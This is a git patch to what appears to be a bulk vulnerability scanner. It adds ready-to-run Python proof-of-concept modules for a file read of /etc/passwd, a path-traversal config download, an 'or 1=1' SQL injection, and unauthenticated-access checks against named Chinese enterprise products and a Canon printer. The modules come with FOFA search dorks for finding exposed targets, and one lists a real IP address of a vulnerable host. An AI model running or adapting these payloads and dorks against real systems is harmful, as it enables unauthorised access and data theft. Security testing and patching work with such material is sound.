From 80e026571e5e9ddef2c411eba538140b5d70275e Mon Sep 17 00:00:00 2001 From: openx-org Date: Fri, 4 Nov 2022 18:00:15 +0800 Subject: [PATCH] 2.23.9 --- README.md | 11 ++- poc/HJ_宏景/File_Read/poc.py | 75 ++++++++++++++++++ poc/HST_好视通/File_Read/poc.py | 72 +++++++++++++++++ poc/HT_华天OA/Sqli_ApiController/poc.py | 73 +++++++++++++++++ .../Unauth_Access/poc.py | 73 +++++++++++++++++ poc/LR_龙软科技/Info_Disclosure/poc.py | 73 +++++++++++++++++ poc/MY_木云科技/Unauth_Access/poc.py | 73 +++++++++++++++++ poc/common/Git_Info_Disclosure/poc.pyc | Bin 2006 -> 0 bytes poc/common/Svn_Info_Disclosure/poc.pyc | Bin 2144 -> 0 bytes poc/common/Url_Alive/poc.pyc | Bin 1605 -> 0 bytes poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc | Bin 2141 -> 0 bytes poc/php/Backdoor_v8dev/poc.pyc | Bin 1918 -> 0 bytes 12 files changed, 448 insertions(+), 2 deletions(-) create mode 100644 poc/HJ_宏景/File_Read/poc.py create mode 100644 poc/HST_好视通/File_Read/poc.py create mode 100644 poc/HT_华天OA/Sqli_ApiController/poc.py create mode 100644 poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py create mode 100644 poc/LR_龙软科技/Info_Disclosure/poc.py create mode 100644 poc/MY_木云科技/Unauth_Access/poc.py delete mode 100644 poc/common/Git_Info_Disclosure/poc.pyc delete mode 100644 poc/common/Svn_Info_Disclosure/poc.pyc delete mode 100644 poc/common/Url_Alive/poc.pyc delete mode 100644 poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc delete mode 100644 poc/php/Backdoor_v8dev/poc.pyc diff --git a/README.md b/README.md index 6c54ea1..8c8b7ab 100644 --- a/README.md +++ b/README.md @@ -10,14 +10,14 @@ [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE) -[![POC_NUM](https://img.shields.io/badge/poc_num-174-orange.svg)](#PocSupport) +[![POC_NUM](https://img.shields.io/badge/poc_num-180-orange.svg)](#PocSupport) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree) ![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue) ## 🦌 简介 -1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有174个POC; +1、POC数量、经过麒麟实验室小伙伴们的不懈努力现已有180个POC; 2、使用python编写、跨平台、并发能力强、扫描速度非常快; @@ -202,6 +202,7 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``| ||MAC1200R电信定制版默认弱口令|``poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py``| |中国移动|中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞|``poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py``| +|Combodo iTop|Combodo iTop信息泄露漏洞|``poc/Combodo_ITop/Info_Disclosure/poc.py``| |common(通用)|git信息泄露|``poc/common/Git_Info_Disclosure/poc.py``| ||svn信息泄露|``poc/common/Svn_Info_Disclosure/poc.py``| ||URL存活检测|``poc/common/Url_Alive/poc.py``| @@ -245,14 +246,18 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |海康威视|HIKVISION 视频编码设备接入网关 任意文件下载|``poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py``| ||HIKVISION 流媒体管理服务器弱口令|``poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py``| ||HIKVISION 流媒体管理服务器任意文件读取|``poc/HIKVISION/File_Read_Stream_Media_Manager/poc.py``| +|宏景|宏景人力资源信息管理系统 文件读取漏洞|``poc/HJ_宏景/File_Read/poc.py``| |宏电|宏电 H8922 后台任意文件读取漏洞|``poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py``| |好视通|好视通视频会议平台 任意文件下载|``poc/HST_好视通/File_Download/poc.py``| +||好视通视频会议平台 任意文件读取|``poc/HST_好视通/File_Read/poc.py``| |华为|Huawei HG659 lib 任意文件读取漏洞|``poc/Huawei/File_Read_HG659_lib/poc.py``| +|华天OA|华天动力OA sql注入漏洞|``poc/HT_华天OA/Sqli_ApiController/poc.py``| |Wayos AC|集中管理系统默认弱口令|``poc/WayosAC/poc.py``| |汇文|汇文OPAC敏感信息泄露|``poc/HuiWen_汇文/Info_Disclosure/poc.py``| ||汇文OPAC弱口令|``poc/HuiWen_汇文/Weak_Pass/poc.py``| |蜂网互联|蜂网互联 企业级路由器v4.31 密码泄露漏洞|``poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py``| |Intelbras|Intelbras Wireless 未授权与密码泄露|``poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/poc.py``| +|佳能打印机|IRADVC3325 佳能打印机未授权访问漏洞|``poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py``| |Jboss|Jboss未授权访问|``poc/Jboss/Unauth_Access/poc.py``| |Jellyfin|Jellyfin任意文件读取|``poc/jellyfin/File_Read_CVE_2021_21402/poc.py``| ||Jellyfin RemoteImageController.cs SSRF漏洞(CVE-2021-29490)|``poc/jellyfin/SSRF_CVE_2021_29490/poc.py``| @@ -273,12 +278,14 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||Lanproxy弱口令漏洞|``poc/Lanproxy/Weak_Pass/poc.py``| |朗驰欣创|朗驰欣创视频监控系统 FTP账号密码泄露|``poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/poc.py``| |利谱第二代防火墙|利谱第二代防火墙存在信息泄露漏洞|``poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py``| +|龙软科技|龙软科技 全员考试系统信息泄露|``poc/LR_龙软科技/Info_Disclosure/poc.py``| |佑友|佑友防火墙 弱口令|``poc/MailGard_佑友/Weak_Pass_FireWall/poc.py``| ||佑友防火墙 后台命令执行漏洞|``poc/MailGard_佑友/RCE_ping_FireWall/poc.py``| |迈普 ISG1000安全网关|迈普 ISG1000安全网关 任意文件下载漏洞|``poc/MaiPu_迈普/File_Download_webui/poc.py``| |MC573|MC573未授权访问|``poc/MC573/UnAuth_MC573/poc.py``| |MessageSolution企业邮件归档管理系统|MessageSolution企业邮件归档管理系统 EEA 信息泄露|``poc/MessageSolution/Info_Disclosure/poc.py``| |MetaBase|MetaBase任意文件读取漏洞 CVE-2021-41277|``poc/Metabase/File_Read_CVE_2021_41277/poc.py``| +|木云科技|资源统一管理平台未授权访问漏洞|``poc/MY_木云科技/Unauth_Access/poc.py``| |蓝海卓越|蓝海卓越计费管理系统 任意文件读取|``poc/NatShell_蓝海卓越/File_Read/poc.py``| ||蓝海卓越计费管理系统 认证hash泄露|``poc/NatShell_蓝海卓越/HashInfo_DisClosure/poc.py``| |中科网威|中科网威 下一代防火墙控制系统 账号密码泄露漏洞|``poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py``| diff --git a/poc/HJ_宏景/File_Read/poc.py b/poc/HJ_宏景/File_Read/poc.py new file mode 100644 index 0000000..edf2f04 --- /dev/null +++ b/poc/HJ_宏景/File_Read/poc.py @@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-17", # POC创建时间 + "UpdateDate" : "2022-10-17", # POC创建时间 + "PocDesc" : """ + 通过该POC可以下载passwd文件造成信息泄露漏洞。 + POC为:URL+/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He + + """, # POC描述,写更新描述,没有就不写 + + "name" : "北京宏景世纪软件股份有限公司人力与人才信息管理系统文件读取漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1017", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-17", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="人力资源信息管理系统" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "root:/root" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/HST_好视通/File_Read/poc.py b/poc/HST_好视通/File_Read/poc.py new file mode 100644 index 0000000..6c63761 --- /dev/null +++ b/poc/HST_好视通/File_Read/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-09-20", # POC创建时间 + "UpdateDate" : "2022-09-20", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "好视通视频平台 任意文件读取", # 漏洞名称 + "VulnID" : "oFx-2022-0003", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "好视通视频会议平台", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-09-20", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="好视通-视频会议" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/register/toDownload.do?fileName=..\..\..\..\FMServer/ServiceConfig.xml" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "fastmeeting" and "live_ice.cfg"in req.text and req.status_code == 200 : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/HT_华天OA/Sqli_ApiController/poc.py b/poc/HT_华天OA/Sqli_ApiController/poc.py new file mode 100644 index 0000000..bb247e3 --- /dev/null +++ b/poc/HT_华天OA/Sqli_ApiController/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-11", # POC创建时间 + "UpdateDate" : "2022-10-11", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "华天动力OAsql注入漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1011", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-11", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="华天动力-OA8000" + """, # fofa搜索语句 + "example" : "http://14.29.237.26:88/", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/OAapp/HtClientServlet2" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "command=getChat&receiver='%20or%201=1%20or%20''='" + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers, data = data, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "W3siY29udGVudCI6" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py new file mode 100644 index 0000000..1fc3b16 --- /dev/null +++ b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-24", # POC创建时间 + "UpdateDate" : "2022-10-24", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "佳能打印机设备存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1027", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-27", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "设备名称 :" and "C3325 (QTS24430)" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/LR_龙软科技/Info_Disclosure/poc.py b/poc/LR_龙软科技/Info_Disclosure/poc.py new file mode 100644 index 0000000..2fdfdc1 --- /dev/null +++ b/poc/LR_龙软科技/Info_Disclosure/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-19", # POC创建时间 + "UpdateDate" : "2022-10-19", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "北京龙软科技股份有限公司全员考试系统信息泄露", # 漏洞名称 + "VulnID" : "oFx-2022-1019", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-19", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + icon_hash="-743571358" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/files/temp/" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "/files/temp/" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/MY_木云科技/Unauth_Access/poc.py b/poc/MY_木云科技/Unauth_Access/poc.py new file mode 100644 index 0000000..bd5acff --- /dev/null +++ b/poc/MY_木云科技/Unauth_Access/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-24", # POC创建时间 + "UpdateDate" : "2022-10-24", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "木云科技资源统一管理平台存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1024", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + title="资源统一管理平台" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/logger/siteSituational/?id=s1&tokenundefined" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "站点分析 - 资源统一管理平台系统" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc deleted file mode 100644 index 0c459334d564ec09c3186b6dc52efd9d159d2a89..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2006 zcmcIk-E$LF6hFI3ladz7hkzBuojNdKhGvttw1A>A<;y|PN%@*OOx*6?B-?CuY?40l;2)sp-i-s!_-ficU-#Z~&OP^c zPTcWMZjo4)(FOYWVpEr*+MWDAzKW_5@aucu@u=dFqR{G5sYSJ zFM+WF*~?(O0-e3+dL3O`Q%i2{JZklZST~>r_*P=$;Xv%FIPq$S5JQ9ot~H*ov6&*`{U?{@8;`~^0o1~ zkIz&<+|Pn?^qj?R>(uXuM)@Jp3HKUsS6(EI9f2Spvq)91?ful*D8*?oB38u32NWER=j!XvfN zd1y#GX|2_8+#KD2T9&Z_-KeS^U9m)beXOe^mPoX#hY~7(S+z*9YHt;^4B72$O04EW zk9mY_O2p%$)?`4-7Z4Qa2x^8x%FJg>juK&DW}Y}jrpsvHwdP+pe)M-Fcn%?#kzrT{ z#Ly7Hs04-#%ZCFnB!RmbOqsU;%F9F>)WkaI91enwIK^dzZ5Yv94+i$ca2*V0fyvO1 zTd{W{FogJS07MJYX6zM=IVuH)LogJAeq5UmIT_qLfc?WQA;^Weipl$`pPk*r4?b_% zZ#P2_%bkmW`x{8ZVUUKxFd~61!GR$e8;PTuo<$eI^gW7sdkAIH~! zyWFN(l&o!OIVkoe7x1(=GE|NURd?*PnGwj~SU@POqN2CBCc0ffgbw0~UCt5HvNUyF zEUrX%X}W1Mhh|?_-mw|66f`LB^(Y6FL_C#Pm+D%hVB1+_Kk3_van`kW#o9ZS=*}H` zcD=h+vCJG%wi7+)tWmnNu9GL~hIlL<>*#2Y$J!EYN{^P-T(fpejFY_x#@5XlVl$DJ zZaLJSB;Af}6P@AM5s=Fg%|O^D`P2|Y3TKj;9yEXD`f?;LDLB+*jysrk+`PtWGb_rw zL%0?dOQHs%pIq`$kx)h%A1N8)hfkSy+F=c7p-f{%n$jJEh{7>4z=Xixl5wY72Xs>4 z`9(SW{pvc@_fv44fk9#75D+17+KP+tC6mzPQhtcX#ze%ZB~esB5V{j3m6wL9hc!Es z)64-Axw^&Ci+QXSRkxdLN3l9H9G2gvkJidyTL32Cf zuVI)}>$6Deu;$vPouSDU{5X&J>_Y#`t;93Fk#~%uMc(A2h^|J$@75?q@OEMUFA$b% KQm`h;k-*;<9zdJ` diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc deleted file mode 100644 index 04401dd6536351862f4c0f88280b618cbae15ddf..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2144 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 Nh3sb+tY^8R{SSY%X_f#0 diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc deleted file mode 100644 index fd50364c76c3bcae7ebbbb970e42179d35f9b9a4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2141 zcmcIlTTdHD6h6DgCKwXPrMb2dirUIAcrm%OjgqQSF1<;#GHp_!NUq~uU}3%M?u-LS zMhZA2kcJR74J5>AN*h{~CWc&;7#xS!{*Ugimxrnkee6SfW^5B^pS$Zl=giERGvAz< z^V##~djH3#7r%@_`SGBB4?l7rg^WJ|G=TOMTYz?<(l0{02#NsR9!LWS%v%Jl3gTX9 z_ky6V2iXI16&#SgAp1~NgS-w^4aj~}wIJ7_Laz;|>OpQmwGre^s5XPV1=TAcZ$-5Y zmcE|6b^1MNPLUxV|A4WkOs7TAq|)xYs+4G3sbKZ>NOMY^K8tSOZBg=jU( zvx-SnL#JM}yVdTbLVajOleEh)37gf@+!AVP-rp2@n+G{+Dp9H&!;jSCsJ{`P;`N!v zMsD$tpBk}a3W<@OIR25MY5g6lZsqgN`Eh6BqLqK@&gJd#30j52dNi)kb*ub%fFp@S zD-Mv2s|FemHHMmlZv{gf1$vw;0bh%;nFl+W)O3#UFWe``Re|B$n6q-{tlT|&c+7pW z;1=c(kA3eOt8lIOIA6@)`R&{gpI~QZOUo5UN34af?a{H~)cHyjEBD}!=a=o=Pfljk zxpUQ8yj9GP6!X`LLks9teDuOzO1s$?Zgv`*?%Xry;gCIl!5$uTvpFk&r4q);jM78KJGQbU`no^=XkU2jOe{E$uVbna5Q20@o?&b& zKeK#p%3ZpMnO(ctOLq1>)MS*MWl3Uq+}%iPZd zDl%?KA&K|^iwETn)0x3!870meb*X4#xCVi5l2&A=tlPOLyrh%fj5yjYN4lw zH8EYx!BNg^>rR`}vn>7(3e zHLxlfF@9zu6SK>Cyf3CCC^B?_p(#N%NGTx0*3Y}nBIEJ3kmJLfnIl^mQE;YL0@wg9 zNE=$x=LE@9>W%81JyEq!MJ*jOV#&CoQzE^u(hrhnB;!P%lrUmacbUOgj7W#7DVRz* zLSj*!`2-XF;Vl^Vb^J&p3aF_Q8bqJq5o(2vqDSxv0dbeGTi7IS7U~7R7+^UHZ$-fi z2tjM=nY|n{=_iyWUsg%4_Ij#Cu7zq}*%JMpe*m{P!9@T7 diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc deleted file mode 100644 index 22d029369bf4939910b9c56bb54acc97cccdb066..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1918 